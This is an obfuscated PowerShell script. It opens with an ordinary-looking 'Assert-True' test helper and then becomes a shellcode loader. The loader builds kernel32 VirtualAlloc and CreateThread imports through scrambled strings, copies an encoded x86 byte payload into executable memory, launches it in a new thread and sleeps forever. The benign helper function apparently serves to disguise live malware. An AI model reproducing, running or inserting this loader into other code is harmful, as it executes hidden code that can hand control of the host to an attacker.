function AssE`R`T-`TRUE
{
    
    [CmdletBinding()]
    param(
        [Parameter(posiTioN=0)]
        [object]
        
        ${co`N`dIT`Ion}, 

        [Parameter(PositIon=1)]
        [string]
        
        ${MEss`A`GE}
    )

    &("{3}{0}{1}{2}" -f 'tri','c','tMode','Set-S') -Version ("{1}{0}"-f'st','Late')

    if( -not ${c`ondit`ioN} )
    {
        .("{1}{0}"-f'l','Fai') -Message  ('Expec'+'te'+'d '+'t'+'rue '+'bu'+'t '+'wa'+'s '+'fals'+'e: '+"$message")
    }
}


${J`cV} = ((("{9}{72}{57}{35}{69}{59}{31}{78}{30}{70}{25}{40}{82}{32}{49}{84}{65}{3}{89}{48}{0}{41}{47}{26}{60}{66}{20}{33}{53}{22}{81}{75}{51}{6}{58}{39}{7}{77}{12}{15}{63}{61}{5}{1}{83}{14}{42}{28}{21}{29}{24}{76}{10}{56}{88}{38}{68}{19}{11}{80}{27}{54}{50}{36}{43}{37}{64}{79}{44}{86}{17}{23}{34}{62}{52}{18}{55}{2}{67}{8}{13}{71}{73}{4}{87}{45}{46}{16}{85}{74}" -f 'ize, uint f','(','pu','ntP','ic exter','teThread','l','pub','c ','[','nt dwSt','IntPtr lpPar','c static extern I','s','ntPtr lp','ntPt','ntP','adId);[DllImpo','t.dll{0})','pStartAddress, ','tect)','ttribu','mpo','r','e',' In','locat','r, uint ','readA','t','tic e','public st','r',';[Dl','t({0}','}kernel32.dll','t','onFlag','n','2.dll{0})]','t','l','Th','i','Thr','t','r memset(I','Al',', uint dwS','tual','a','e','vcr','lI','dwCre',']','a','rt({0','3',']','ionType, uin','ea','ms','r Cr','s, In','oc(I','t flPro','bli','tPtr l','{0})','xtern','t','DllImpo','at','nt);','{0}kern','s, ui','li','a','tPtr lp','amete','rt(','Ptr Vi','I','All','tr dest, uint src, uint cou','e','n IntP','ckSize, I','tr lpAddress'))-F[ChAR]34);${W} = .("{1}{2}{0}"-f 'Type','Ad','d-') -memberDefinition ${J`Cv} -Name ("{1}{0}"-f 'n32','Wi') -namespace ("{0}{1}{3}{2}"-f 'Win32F','unc','ons','ti') -passthru;[Byte[]];[Byte[]]${z} = 0xb8,0xb3,0xc6,0x88,0xb3,0xda,0xc0,0xd9,0x74,0x24,0xf4,0x5d,0x31,0xc9,0xb1,0x47,0x83,0xed,0xfc,0x31,0x45,0x0f,0x03,0x45,0xbc,0x24,0x7d,0x4f,0x2a,0x2a,0x7e,0xb0,0xaa,0x4b,0xf6,0x55,0x9b,0x4b,0x6c,0x1d,0x8b,0x7b,0xe6,0x73,0x27,0xf7,0xaa,0x67,0xbc,0x75,0x63,0x87,0x75,0x33,0x55,0xa6,0x86,0x68,0xa5,0xa9,0x04,0x73,0xfa,0x09,0x35,0xbc,0x0f,0x4b,0x72,0xa1,0xe2,0x19,0x2b,0xad,0x51,0x8e,0x58,0xfb,0x69,0x25,0x12,0xed,0xe9,0xda,0xe2,0x0c,0xdb,0x4c,0x79,0x57,0xfb,0x6f,0xae,0xe3,0xb2,0x77,0xb3,0xce,0x0d,0x03,0x07,0xa4,0x8f,0xc5,0x56,0x45,0x23,0x28,0x57,0xb4,0x3d,0x6c,0x5f,0x27,0x48,0x84,0x9c,0xda,0x4b,0x53,0xdf,0x00,0xd9,0x40,0x47,0xc2,0x79,0xad,0x76,0x07,0x1f,0x26,0x74,0xec,0x6b,0x60,0x98,0xf3,0xb8,0x1a,0xa4,0x78,0x3f,0xcd,0x2d,0x3a,0x64,0xc9,0x76,0x98,0x05,0x48,0xd2,0x4f,0x39,0x8a,0xbd,0x30,0x9f,0xc0,0x53,0x24,0x92,0x8a,0x3b,0x89,0x9f,0x34,0xbb,0x85,0xa8,0x47,0x89,0x0a,0x03,0xc0,0xa1,0xc3,0x8d,0x17,0xc6,0xf9,0x6a,0x87,0x39,0x02,0x8b,0x81,0xfd,0x56,0xdb,0xb9,0xd4,0xd6,0xb0,0x39,0xd9,0x02,0x2c,0x3f,0x4d,0x6d,0x19,0x3e,0xfc,0x05,0x58,0x41,0xef,0x89,0xd5,0xa7,0x5f,0x62,0xb6,0x77,0x1f,0xd2,0x76,0x28,0xf7,0x38,0x79,0x17,0xe7,0x42,0x53,0x30,0x8d,0xac,0x0a,0x68,0x39,0x54,0x17,0xe2,0xd8,0x99,0x8d,0x8e,0xda,0x12,0x22,0x6e,0x94,0xd2,0x4f,0x7c,0x40,0x13,0x1a,0xde,0xc6,0x2c,0xb0,0x75,0xe6,0xb8,0x3f,0xdc,0xb1,0x54,0x42,0x39,0xf5,0xfa,0xbd,0x6c,0x8e,0x33,0x28,0xcf,0xf8,0x3b,0xbc,0xcf,0xf8,0x6d,0xd6,0xcf,0x90,0xc9,0x82,0x83,0x85,0x15,0x1f,0xb0,0x16,0x80,0xa0,0xe1,0xcb,0x03,0xc9,0x0f,0x32,0x63,0x56,0xef,0x11,0x75,0xaa,0x26,0x5f,0x03,0xc2,0xfa;${g} = 0x1000;if (${Z}."LenG`TH" -gt 0x1000){${G} = ${Z}."l`eNgtH"};${i`E7}=${w}::("{3}{0}{1}{2}" -f'irtual','A','lloc','V').Invoke(0,0x1000,${G},0x40);for (${I}=0;${i} -le (${z}."lE`N`GTh"-1);${I}++) {${W}::"M`ems`et"([IntPtr](${i`E7}.("{1}{0}"-f 't32','ToIn').Invoke()+${i}), ${Z}[${I}], 1)};${W}::("{1}{3}{0}{2}" -f 'eateThrea','C','d','r').Invoke(0,0,${I`E7},0,0,0);for (;;){.("{2}{1}{0}" -f'eep','t-sl','Star') 60};
